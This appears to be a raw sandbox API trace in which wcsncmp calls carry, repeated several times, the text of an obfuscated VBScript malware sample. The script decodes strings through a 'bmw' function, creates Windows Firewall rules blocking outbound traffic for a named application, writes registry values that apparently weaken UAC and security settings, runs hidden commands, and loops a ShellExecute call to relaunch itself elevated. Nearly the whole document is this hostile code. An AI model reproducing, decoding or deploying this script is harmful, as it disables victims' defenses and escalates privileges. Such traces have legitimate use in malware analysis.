bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.989] wcsncmp (_String1="ateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0222.989] wcsncmp (_String1="teObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.989] wcsncmp (_String1="eObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.990] wcsncmp (_String1="Object(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0222.990] wcsncmp (_String1="bject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = 